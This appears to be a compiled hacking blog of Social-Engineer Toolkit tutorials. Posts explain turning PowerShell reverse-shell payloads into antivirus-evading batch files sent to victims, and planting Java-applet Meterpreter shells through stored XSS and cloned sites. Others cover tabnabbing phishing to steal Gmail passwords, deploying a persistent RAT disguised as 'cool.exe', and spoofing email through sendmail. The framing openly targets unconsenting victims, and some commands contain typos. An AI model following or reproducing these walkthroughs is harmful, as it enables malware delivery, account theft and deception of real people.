Bypass AV using powershell method using batch file.

In penetration testing first step is how we can bypass AV & make our payload FUD. Previously we saw that we can bypass AV using Veil.At that time we used python module.In veil there are four types of payload.C,C#,powershell and python. Today we use powershell module.

If you don`t aware about powershell ; then you can google it.It`s windows based scripting language like bash in linux.Most of AV cannot detect it.We use SET powershell module to bypass AV; you can also use veil module.

cd  /pentest/exploits/set/
./setoolkit

type 1 which is social engineering attack
After that type 10.

Then give your i.p. & port to connect reverse shell.

Now in figure you can see that it has been generated & stored in to /root/.set/reports/powershell . And we also start metasploit listener.If victim paste our generated payload in cmd then we can get meterpreter shell. But i think it`s hard to tell someone to copy something & paste into cmd. So we will create batch file of our payload.

Create Batch file of our Payload.

(1)open x86_powershell_injection.txt file from  /root/.set/reports/powershell.
(2)Add path of powershell in first line. For example your code is starting from powershell word just put C:\\windows/system32/windowspowershell/v1.0/ before it.
(3)If you want to hide text during execution put @echo off at start of script.
(4)copy all code from x86_powershell_injection.txt
(5)Create new file & paste code
(6)Save this file as .bat extension and send to victim

As soon as he open file we can get shell.

Read More

How to solve metasploit problem in SET?

If you installed metasploit from git repository then you donot face any problem with SET. But If you have installed metasploit from its binary version then when you tried to running social engineering toolkit metasploit attack then might be you get error of some ruby bundle. Here is solution of that problem. I tested on SET Version: 5.2.1 & metasploit v4.6.2-1.

We are going to install Ruby 1.9.3 using RVM. Running all this command in msf3 folder

root@bt:~# cd /opt/metasploit/apps/pro/msf3/

root@bt:/opt/metasploit/apps/pro/msf3# bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) 

 

root@bt:/opt/metasploit/apps/pro/msf3# source /etc/profile.d/rvm.sh

 

root@bt:/opt/metasploit/apps/pro/msf3# rvm -v 

Once RVM is up and running we need to get a couple of libraries that will be required by the Ruby installation:

root@bt:/opt/metasploit/apps/pro/msf3# for package in zlib openssl libxslt libxml2; do rvm pkg install $package; done 

And finally the Ruby 1.9.3 runtime: 

root@bt:/opt/metasploit/apps/pro/msf3# rvm install 1.9.3

root@bt:/opt/metasploit/apps/pro/msf3# rvm 1.9.3 --default

root@bt:/opt/metasploit/apps/pro/msf3# ruby -v

root@bt:/opt/metasploit/apps/pro/msf3# gem install bundler

root@bt:/opt/metasploit/apps/pro/msf3# bundle install

Now open set from its path ; before running set type command like below

cd /pentest/exploits/set

source /etc/profile.d/rvm.sh

rvm 1.9.3 –default

./se-toolkit

Now you can use any metasploit attack from SET .

Read More

How to exploit stored xss using S.E.T?

Stored XSS is the most dangerous type of cross site scripting due to the fact that the user can be exploited just by visiting the web page where the vulnerability occurs.Also if that user happens to be the administrator of the website then this can lead to compromise the web application which is one of the reasons that the risk is higher than a reflected XSS.

(1)First I recommended you to view “How to fiind xss in website?” here.
(2)Open terminal & type following code in terminal.
sudo bash
cd /opt/set
./set
(3)Now select option 1 which is Social-Engineering Attacks.
(4)Select option 2 which is website attack vector.
(5)Select option 3which is Java Applet Attack Method.
(6)Select option 1 web -templetes.
(7)Select option 1 java Required.
(8)Now we will select payload & encoder. So we select simple Windows Reverse_TCP Meterpreter & shikata_ga_nai encoding.
(9)Put listener port:443 . Now metasploit will open.
(10)Now we can go back to the web application and we can try to insert the malicious JavaScript code in the comment field that we already know from before that is vulnerable to XSS.

 (11)When a user will try to access the page that contains the malicious JavaScript the code will executed in his browser and a new window will come up that will contain the following message:

(12)After a while the user will notice a pop-up box that it will ask him if he wants to run the Java applet.

(13)If the user press on the Run button the malicious code will executed and it will return us a shell.
(14)sessions -i 1

Read More

Bypass Antivirus using S.E.T

Bypass Antivirus using multyply injector shell code using SET & Metasploit.

Requirement:-

Victim`s O.S.- windows.

Attacker:- S.E.T ,Metasploit.

(1)Open terminal & type following command

sudo bash

cd /opt/set

./set

(2)Now select option 1 social engineering attack

(3)Select option 2 website attack vector

(4)Now we will choose the option 1 the Java Applet Attack Method

(5)Now we will choose option 2, “Site Cloner”

(6)Enter the URL to clone: http://www.google.com (but you can use any website to run the Java Applet)

(7)Now choose 16 “Multi PyInjector Shellcode Injection”,

(8)Port of the attacker computer. In this example I use port 443

(9)Select the payload you want to deliver via shellcodeexec press enter here

(10)Now again select Port of the attacker computer. In this example I use port 444 and 445

(11)Select the payload you want to deliver via shellcodeexec press enter here

(12)send your I.p. To victim. As soon as he open link & run java applet you have access of victim `s pc

(13)sessions -l

(14)sessions -i I.d

Read More

How to move S.E.T. to Github?

The Social-Engineer Toolkit (SET) and the Artillery open source projects have officially been moved to github. Github provides a much faster platform to getting releases up and a more efficient method for obtaining new releases to SET.

All you need to do to go from the current version to git is do an svn update in the set directory and run the automatic installer. SET updates once pulled through github will now be pulled from the github repositories versus svn. The subversion repos will remain active for a couple months.

How to Move S.E.T. to Github ?

1. Manual

2. Automatic

How to Manual install S.E.T.?

Extra package which is necessary to use SET effectively are as follow.

(1)Metasploit:- You can see my old post about how to install metasploit in ubuntu here.

(2)Ettercap:- If you are on any network & want to attack on network like Man in the Middele Attack or DNS poisoning then you require it.

To install Ettercap open terminal in type following command:-

sudo apt-get install ettercap

(3)Openjdk-6-It`s necessary program to use SET. Just type following command in terminal

sudo apt-get install openjdk-6-jdk

git clone https://github.com/trustedsec/social-engineer-toolkit.git
cd social-engineer-toolkit
./setoolkit

Whenever you need updates, just run the update tool or type git pull. In addition to the new release to git, the installer has been updated to support OSX installations. This update puts SET at version 4.3.4.

How to install Automatic S.E.T.?

In this method we assume that you have already install SET , & which use svn , but new version moved to github.

cd /pentest/exploits/set
svn update
./set

[-] New set_config.py file generated on: 2013-01-04 10:54:25.898164
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2013-01-04 10:54:25.898164
[*] SET is using the new config, no need to restart[!] The Social-Engineer Toolkit has officially moved to github and no longer uses SVN.
[!] Ensure that you have GIT installed and this conversion tool will automatically pull the latest git version for you.
[!] Do you want to do a manual install or have SET do the conversion to GIT for you?

1. Automatic
2. Manual
3. Continue using SET (NO UPDATES ANYMORE!)


Enter your numeric choice: 1
[*] BEFORE YOU START! Ensure you have GIT installed (apt-get install git)
Have you installed GIT? y/n: y
[*] Great! Here we go... Removing old svn repository and moving to new
[*] SET directory has been removed. Now checking out SET from GIT..
[*] This could take a few moments..
Cloning into /opt/set...
remote: Counting objects: 403, done.
remote: Compressing objects: 100% (323/323), done.
remote: Total 403 (delta 81), reused 392 (delta 70)
Receiving objects: 100% (403/403), 35.81 MiB | 1.45 MiB/s, done.
Resolving deltas: 100% (81/81), done.
[*] You should now have the latest from git. To update, run set-update or type git pull
[*] Exit SET and restart. Move out of the current directory and go into the set directory.
[*] You should never have to go through this process again!

====How to Update====

(You may choose either ./set-update or git pull as advise above.)

root@LM:/opt/set# ./set-update
[-] Updating the Social-Engineer Toolkit, be patient...
Already up-to-date.

[*] The updating has finished, returning to main menu..
root@LM:/opt/set# git pull
Already up-to-date.

==== STEP 2====

#If you came across this error message :

root@LM:/opt/set# ./set
[!] Metasploit path not found. These payloads will be disabled.
[!] Please configure in the config/set_config.Just Press

#Then it will pop-up Terms of service

Do you agree to the terms of service [y/n]: y

#It will go to the SET Menu and choose "99" to exit SET

set>99

#Edit config/set_config ( Use nano or vim are up to you )

root@LM:/opt/set# nano config/set_config

#In config/set_config Editor.Please edit base on your Metasploit directory:-

### Define the path to MetaSploit, for example: /pentest/exploits/framework3
METASPLOIT_PATH=/opt/metasploit-4.4.0/msf3/#Save and Exit the Editor.Kindly update your Metasploit by choosing no 4 in SET Menu.

4) Update the Metasploit Framework

set> 4

#Once update you may run SET as normal

Read More

Tabnabbing Tutorial

Tabnabbing is a computer exploit and phishing attack, which persuades users to submit their login details and passwords to popular websites by impersonating those sites and convincing the user that the site is genuine.The attack takes advantage of user trust and inattention to detail in regard to tabs, and the ability of modern web pages to rewrite tabs and their contents a long time after the page is loaded. Tabnabbing operates in reverse of most phishing attacks in that it doesn’t ask users to click on an obfuscated link but instead loads a fake page in one of the open tabs in your browser

We cover two methods of tabnabbing.

(1)Manual.

(2)With the help of S.E.T.

Tab-nabbing with help of S.E.T?

(1)Open S.E.T.(you can find how to install & configure set here?)

(2)Select option 1 which is Social-Engineering Attacks.

(3)Select option 2 which is Website Attack Vectors.

(4)Now option-4 which is tabnabbing attack method

(5)Select site cloner.

(6)Enter URL OF site. (For example if you want to hack gmail account of victim ,then type gmail.com.)

(7)Send link of your I.P. To victim via mail or chat.(You can also spoofemail. See here.)

(8)As soon as he open tab , he found message that “please wait while site is loading.”

(9)when victim change tab, it redirect him to your phishing page.

In next tutorial we will see manual method of tab-nabbing. Because if you have dynamic I.p than this method is not so useful, because as soon as your I.p. Change , listener of S.E.T. Is stopped. So you cannot get password of victim.

Read More

How to use R.A.T. through S.E.T?

RAT is Remote Administration tool , using RAT you can control Remote P.C. ,there are lots of software available for RAT , but they are made from hackers, there is possibility of back-door in that readily available software. So today we use RAT through Social engineering toolkit(SET).

(1)Open your terminal & type

cd /opt/set

./set

(2)update your set

(3)Now select option 3 which is Third party Modules

(4)Now select option 2 which is RATTE (Remote administration tool tommy edition).

(5)Enter I.P. Address of your computer to connect back

(6)Port RATTE Server should listen on [8080]: press enter

(7)Should RATTE be persistent [no|yes]?:yes

(8)Use specifix filename (ex. firefox.exe) [filename.exe or empty]?:cool.exe

(9) Payload has been exported to src/program_junk/ratteM.exe

(10)Now send your ratteM.exe files to victim, as soon as they download and open it

Start the ratteserver listener now [yes|no]:yes

(11)chose 1 option which is list client

(12)if the payload been executed successfully, then you will see a new session and the client details. Note down the session number. Enter the session you want to interact with:press 0 here

Now choose option2 “activate client”

Now you get menu with lots of menu. Select 1st option which is start shell.

Read More

How to install & configure send mail in Ubuntu?

Send mail is program which will help you to send email through command, you can send email from terminal or CMD . In this program we use our machine as a server. I will show you how to install & configure Send-Mail. So we can spoof email to targets. But problem is that this email is detected as spam due to automatic sending through machine.

How to Install Send-Mail?

Open terminal & type following command in terminal.

sudo apt-get install mailutils

sudo apt-get install sendmail

How to configure it?

After installing sendmail , you should configure sendmail. It`s little hard. But don`t worry after that we can spoof email to anyone.

Type following command on terminal

sudo gedit /etc/mail/sendmail.mc

It will open sendmail.mc file.

For example your last two lines are as follow

MAILER(`local')dnl

MAILER(`smtp')dnl

Put this code before that two lines.

MAILER_DEFINITIONS

define('SMART_HOST',`smtp.gmail.com')

Ok. now close that file

Now we will generate configure file from .mc file so type following command in terminal.

sudo bash -c 'cd/etc/mail/ && m4 sendmail.mc >sendmai.cf'

Now everything is complete, try to send mail using terminal or use Social Engineering Tool-Kit as i mention in previous post.

How to send mail through Command?

open terminal and type following command.

telnet 127.0.0.1 25

HELO server

MAIL from:sender`s email address

RCPT to: Recipient address

DATA

Subject:Test mail

from: sender`s email address

to: receiver`s address

Test Mail

.

quit


Now check spam folder of receiver`s email , you got email . Now check show original option of email , you can see that i.p. of computer , o.s. , many other things.

Read More

How to install social engineering toolkit(S.E.T.) in ubuntu?

Social Engineering Tool kit is cool tool which came with BACKTRACK, this increase power of metasploit. If you are on any linux system other than BACKTRACK , then you can install it .

Updated:This article was written when S.E.T. use SVN. Now it`s move to github. So please click here to new installation method.

Extra package which is necessary to use SET effectively are as follow.

(1)Metasploit:- You can see my old post about how to install metasploit in ubuntu here.

(2)Ettercap:- If you are on any network & want to attack on network like Man in the Middele Attack or DNS poisoning then you require it.

To install Ettercap open terminal in type following command:-

sudo apt-get install ettercap

(3)Openjdk-6-It`s necessary program to use SET. Just type following command in terminal

sudo apt-get install openjdk-6-jdk


Now open terminal & change directory to opt.

sudo bash

cd /opt

svn co http://svn.secmaniac.com/social_engineering_toolkit set/

cd /opt/set

svn update

nano config/set_config

Now we will configure it. First it require metaspolit path . So we will put it on configure file. Here comes problem , in first step we install metasploit , it`s directory is opt/metasploit-4.4.0/msf3. But when we put this path in configure file it cannot detect metasploit . So we have to rename metasploit-4.4.0 to framework3. So rename metasploit-4.4.0 folder name to framework3.

Put opt/framework3/msf3 this path in config file. Save it.Type in terminal.

./set

It will open SET .

In next tutorial I will show you how to configure sendmail & use it in set.

I Know I cannot explain good, So if you face any problem please mention in comment.

Updated:This article was written when S.E.T. use SVN. Now it`s move to github. So please click here to new installation method.

Read More